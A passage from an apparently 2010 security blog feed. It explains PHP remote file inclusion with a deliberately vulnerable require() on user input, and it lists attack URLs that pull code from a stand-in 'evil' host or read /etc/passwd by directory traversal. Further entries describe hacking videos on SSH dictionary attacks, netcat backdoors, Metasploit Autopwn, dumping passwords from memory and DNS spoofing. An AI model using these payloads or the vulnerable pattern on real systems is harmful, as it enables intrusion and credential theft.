class="kw2"&gt;&lt;br /&gt;   &lt;span class="re0"&gt;$color&lt;/span&gt; &lt;span class="sy0"&gt;=&lt;/span&gt; &lt;span class="st_h"&gt;'blue'&lt;/span&gt;&lt;span class="sy0"&gt;;&lt;/span&gt;&lt;br /&gt;   &lt;span class="kw1"&gt;if&lt;/span&gt; &lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="kw3"&gt;isset&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt; &lt;span class="re0"&gt;$_GET&lt;/span&gt;&lt;span class="br0"&gt;[&lt;/span&gt;&lt;span class="st_h"&gt;'COLOR'&lt;/span&gt;&lt;span class="br0"&gt;]&lt;/span&gt; &lt;span class="br0"&gt;)&lt;/span&gt; &lt;span class="br0"&gt;)&lt;/span&gt;&lt;br /&gt;      &lt;span class="re0"&gt;$color&lt;/span&gt; &lt;span class="sy0"&gt;=&lt;/span&gt; &lt;span class="re0"&gt;$_GET&lt;/span&gt;&lt;span class="br0"&gt;[&lt;/span&gt;&lt;span class="st_h"&gt;'COLOR'&lt;/span&gt;&lt;span class="br0"&gt;]&lt;/span&gt;&lt;span class="sy0"&gt;;&lt;/span&gt;&lt;br /&gt;   &lt;span class="kw1"&gt;require&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt; &lt;span class="re0"&gt;$color&lt;/span&gt; &lt;span class="sy0"&gt;.&lt;/span&gt; &lt;span class="st_h"&gt;'.php'&lt;/span&gt; &lt;span class="br0"&gt;)&lt;/span&gt;&lt;span class="sy0"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span class="sy1"&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mw-geshi" dir="ltr" style="text-align: left;"&gt; &lt;div class="xml source-xml" style="font-family: monospace;"&gt; &lt;pre class="de1"&gt;&lt;span class="sc3"&gt;&lt;span class="re1"&gt;&lt;form&gt;&lt;/form&gt;&lt;span class="re0"&gt;method&lt;/span&gt;=&lt;span class="st0"&gt;"get"&lt;/span&gt;&lt;span class="re2"&gt;&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;   &lt;span class="sc3"&gt;&lt;span class="re1"&gt;&lt;select&gt;       &lt;option&gt; value="red"&amp;gt;red&lt;/option&gt;      &lt;option&gt; value="blue"&amp;gt;blue&lt;/option&gt;   &lt;/select&gt;&lt;span class="re2"&gt;&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;   &lt;span class="sc3"&gt;&lt;span class="re1"&gt;&lt;input /&gt;&lt;/span&gt; &lt;span class="re0"&gt;type&lt;/span&gt;=&lt;span class="st0"&gt;"submit"&lt;/span&gt;&lt;span class="re2"&gt;&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="sc3"&gt;&lt;span class="re1"&gt;&lt;/span&gt;&lt;span class="re2"&gt;&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;The developer intended only blue.php and red.php to be used as options. But as anyone can easily insert arbitrary values in &lt;code&gt;COLOR&lt;/code&gt;, it is possible to inject code from files:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;code&gt;/vulnerable.php?COLOR=&lt;b&gt;http://evil/exploit?&lt;/b&gt;&lt;/code&gt; - injects a remotely hosted file containing an exploit.&lt;/li&gt;&lt;li&gt;&lt;code&gt;/vulnerable.php?COLOR=&lt;b&gt;C:\\ftp\\upload\\exploit&lt;/b&gt;&lt;/code&gt; - Executes code from an already uploaded file called exploit.php&lt;/li&gt;&lt;li&gt;&lt;code&gt;/vulnerable.php?COLOR=&lt;b&gt;../../../../../../../../etc/passwd&lt;/b&gt;&lt;/code&gt; - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.&lt;/li&gt;&lt;li&gt;&lt;code&gt;/vulnerable.php?COLOR=&lt;b&gt;C:\\notes.txt&lt;/b&gt;&lt;/code&gt; - example using NULL meta character to remove the &lt;code&gt;.php&lt;/code&gt; suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled this limits the attack by escaping special characters, this disables the use of the Null character)&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6015153322106350667?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6015153322106350667/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/php-remote-file-inclusion.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6015153322106350667'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6015153322106350667'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/php-remote-file-inclusion.html' title='PHP Remote File Inclusion'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3150197380740553268</id><published>2010-04-14T11:34:00.000+08:00</published><updated>2010-04-15T16:30:21.814+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SSH'/><title type='text'>SSH Hacking</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Tu-aIL-uMaU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Tu-aIL-uMaU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;In this video, a shell script does the work on Linux to hack into a ssh account.&amp;nbsp; &lt;/span&gt;Then a dictionary attack is launched against SSH using the shell script to crack the password.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3150197380740553268?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3150197380740553268/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/ssh-hacking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3150197380740553268'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3150197380740553268'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/ssh-hacking.html' title='SSH Hacking'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3216748955979216180</id><published>2010-04-13T11:47:00.000+08:00</published><updated>2010-04-13T11:48:08.263+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Netcat'/><title type='text'>Using NetCat as a Backdoor</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/aPmf_3wjQGg&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/aPmf_3wjQGg&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;In this video a windows RPC exploit is used with the help of Metasploit on Backtrack.After exploiting the RPC vulnerability in windows,hacker uploads Netcat tool to regain access when ever he wants.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3216748955979216180?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3216748955979216180/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/using-netcat-as-backdoor.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3216748955979216180'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3216748955979216180'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/using-netcat-as-backdoor.html' title='Using NetCat as a Backdoor'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3425490678804766581</id><published>2010-04-12T15:38:00.000+08:00</published><updated>2010-04-13T11:32:32.133+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Metasploit Autopwn Tool</title><content type='html'>&amp;nbsp;&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/VXmE0QycUd8&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/VXmE0QycUd8&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;This Video shows MetaSploit Autopwn tool in action.After identifying a victim's machine using port scanning techniques. Just run the Metasploit framework and connect to sqlite database. Then run a port scan on victim's machine so that the result is saved in the database. After that, run the Autopwn tool against the port scan result, Autopwn will automatically run all the exploits against the open port.When the attack completes successfully, we get open sessions. This can also be achived by running Autopwn exploits against the result saved by Nessus in NBE format.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3425490678804766581?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3425490678804766581/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/metasploit-autopwn-tool.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3425490678804766581'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3425490678804766581'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/metasploit-autopwn-tool.html' title='Metasploit Autopwn Tool'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5864362484123718442</id><published>2010-04-11T17:30:00.000+08:00</published><updated>2010-04-13T11:32:50.480+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Dump Cleartext Passwords From Windows Memory</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/6Ag22RsghjY&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/6Ag22RsghjY&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;MDD is a physical memory acquisition tool for imaging Windows based computers created by the innovative minds at ManTech International Corporation. MDD is capable of acquiring memory images from Win2000, XP, Vista and Windows Server.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5864362484123718442?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5864362484123718442/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/dump-cleartext-passwords-from-windows.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5864362484123718442'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5864362484123718442'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/dump-cleartext-passwords-from-windows.html' title='Dump Cleartext Passwords From Windows Memory'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5548911389336452806</id><published>2010-04-09T19:04:00.000+08:00</published><updated>2010-04-13T11:33:18.285+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Spoofing'/><title type='text'>DNS Spoof Virtual Hosts</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Gb7NZdH--SY&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Gb7NZdH--SY&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;DNS Spoofing is a type of MITM attack in which victim's computer is sent a fake DNS reply for a particular website,forcing his machine to visit a different site.But when this Spoofed IP is hosting multiple virtual sites with multiple Host Headers and attacker wants to use this IP as a fake DNS reply for DNS Spoofing then the server will not be able to determine the proper destination as Host Header will be missing in the request.Hence DNS Spoofing attack will not success.&lt;br /&gt;&lt;br /&gt;In this video , Ettercap is combined with a C program to change the host header on the fly and submits a new get request to the web server, which allows an attacker to successfully launch DNS Spoofing attack with a IP hosting multiple virtual web sites.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5548911389336452806?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5548911389336452806/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/dns-spoof-virtual-hosts.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5548911389336452806'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5548911389336452806'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/dns-spoof-virtual-hosts.html' title='DNS Spoof Virtual Hosts'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1426401890540761048</id><published>2010-04-08T12:31:00.000+08:00</published><updated>2010-04-08T12:31:36.866+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Attacking Oracle with the Metasploit Framework</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/_76b2UzNJe4&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/_76b2UzNJe4&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;The &lt;b&gt;Oracle Database&lt;/b&gt; (commonly referred to as &lt;i&gt;Oracle RDBMS&lt;/i&gt; or simply as &lt;i&gt;Oracle&lt;/i&gt;) is a relational database management system (RDBMS) produced and marketed by Oracle Corporation. As of 2009&lt;sup class="plainlinks noprint asof-tag update" style="display: none;"&gt;&lt;a class="external text" href="http://en.wikipedia.org/w/index.php?title=Oracle_Database&amp;amp;action=edit" rel="nofollow"&gt;[update]&lt;/a&gt;&lt;/sup&gt;, Oracle remains a major presence in database computing.&lt;sup class="reference" id="cite_ref-1"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt;&lt;br /&gt;Larry Ellison and his friends and former co-workers Bob Miner and Ed Oates started the consultancy Software Development Laboratories (SDL) in 1977. SDL developed the original version of the Oracle software. The name &lt;i&gt;Oracle&lt;/i&gt; comes from the code-name of a CIA-funded project Ellison had worked on while previously employed by Ampex.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1426401890540761048?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1426401890540761048/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/attacking-oracle-with-metasploit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1426401890540761048'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1426401890540761048'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/attacking-oracle-with-metasploit.html' title='Attacking Oracle with the Metasploit Framework'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3717374748732071595</id><published>2010-04-07T20:07:00.000+08:00</published><updated>2010-04-07T20:10:26.107+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exploit Tools'/><title type='text'>Auditing Anti-Virus Configuration and Installation with Nessus 3</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/7zlbgemp_tQ&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/7zlbgemp_tQ&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nessus&lt;/b&gt; is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example: &lt;ul&gt;&lt;li&gt;Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.&lt;/li&gt;&lt;li&gt;Misconfiguration (e.g. open mail relay, missing patches, etc).&lt;/li&gt;&lt;li&gt;Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.&lt;/li&gt;&lt;li&gt;Denials of service against the TCP/IP stack by using mangled packets&lt;/li&gt;&lt;/ul&gt;On UNIX (including Mac OS X), it consists of &lt;b&gt;nessusd&lt;/b&gt;, the Nessus daemon, which does the scanning, and &lt;i&gt;nessus&lt;/i&gt;, the client, which controls scans and presents the vulnerability results to the user. For Windows, &lt;b&gt;Nessus 3&lt;/b&gt; installs as an executable and has a self-contained scanning, reporting and management system.&lt;sup class="reference" id="cite_ref-0"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt; According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey.&lt;sup class="reference" id="cite_ref-sectools_1-0"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt; Tenable estimates that it is used by over 75,000 organizations worldwide.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3717374748732071595?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3717374748732071595/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/auditing-anti-virus-configuration-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3717374748732071595'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3717374748732071595'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/auditing-anti-virus-configuration-and.html' title='Auditing Anti-Virus Configuration and Installation with Nessus 3'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3118362568793789169</id><published>2010-04-06T09:49:00.000+08:00</published><updated>2010-04-06T09:52:56.386+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exploit Tools'/><title type='text'>Exploiting XP with SAINT</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/2Qdody_n2ZE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/2Qdody_n2ZE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;The SAINT vulnerability scanner identifies threats across your network including devices, operating systems, desktop applications, Web applications, databases, and more. The penetration testing component is integrated with the SAINT vulnerability scanner. SAINTexploit automates the penetration testing process, examines vulnerabilities discovered by the scanner, exposes where the attacker could breach the network, and exploits the vulnerability prove its existence without a doubt.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3118362568793789169?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3118362568793789169/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/exploiting-xp-with-saint.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3118362568793789169'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3118362568793789169'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/exploiting-xp-with-saint.html' title='Exploiting XP with SAINT'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-2955873108830688997</id><published>2010-04-05T18:05:00.001+08:00</published><updated>2010-04-06T09:54:51.928+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exploit Tools'/><title type='text'>Exploiting Windows Vista with Core Impact 8</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/SsI41_ZYB8c&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/SsI41_ZYB8c&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CORE IMPACT&lt;/b&gt; is a commercial automated penetration testing software solution developed by Core Security Technologies which allows the user to probe for and exploit security vulnerabilities in computer networks, endpoints and web applications.&lt;br /&gt;The product's interface is designed to be usable by individuals both with and without specialized training in penetration testing and vulnerability assessment, and includes functions for generating reports from the gathered information. It is used by over 800 companies and government entities worldwide.&lt;sup class="Template-Fact" style="white-space: nowrap;" title="This claim needs references to reliable sources from May 2008"&gt;&lt;i&gt; &lt;/i&gt;&lt;/sup&gt;&lt;br /&gt;Core Impact is designed to attempt to evaluate the whole of the security in an office ecosystem, checking for known exploits, vulnerability to psychological attack, viability of current software and hardware security, as well checking for compliance with government regulation.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-2955873108830688997?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/2955873108830688997/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/exploiting-windows-vista-with-core.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2955873108830688997'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2955873108830688997'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/04/exploiting-windows-vista-with-core.html' title='Exploiting Windows Vista with Core Impact 8'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-7590258558218155417</id><published>2010-04-05T11:57:00.000+08:00</published><updated>2010-04-05T11:58:39.617+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Redirects'/><title type='text'>Hacking Guestbook (Redirect)</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/o1HkgsNahOY&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed 